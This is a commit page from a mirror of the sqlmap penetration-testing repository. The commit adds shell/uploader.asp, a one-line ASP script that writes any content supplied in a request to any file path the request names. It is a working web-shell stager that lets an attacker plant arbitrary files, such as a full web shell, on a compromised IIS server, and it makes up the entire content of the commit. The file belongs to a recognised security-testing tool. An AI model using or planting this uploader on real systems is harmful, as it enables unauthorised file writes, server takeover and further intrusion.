mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-06 16:32:23 +01:00
Added an ASP uploader
This commit is contained in:
parent
e10ab5aa0e
commit
9b0f11f879
1 changed files with 1 additions and 0 deletions
1
shell/uploader.asp
Normal file
1
shell/uploader.asp
Normal file
|
|
@ -0,0 +1 @@
|
|||
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
|
||||
Loading…
Reference in a new issue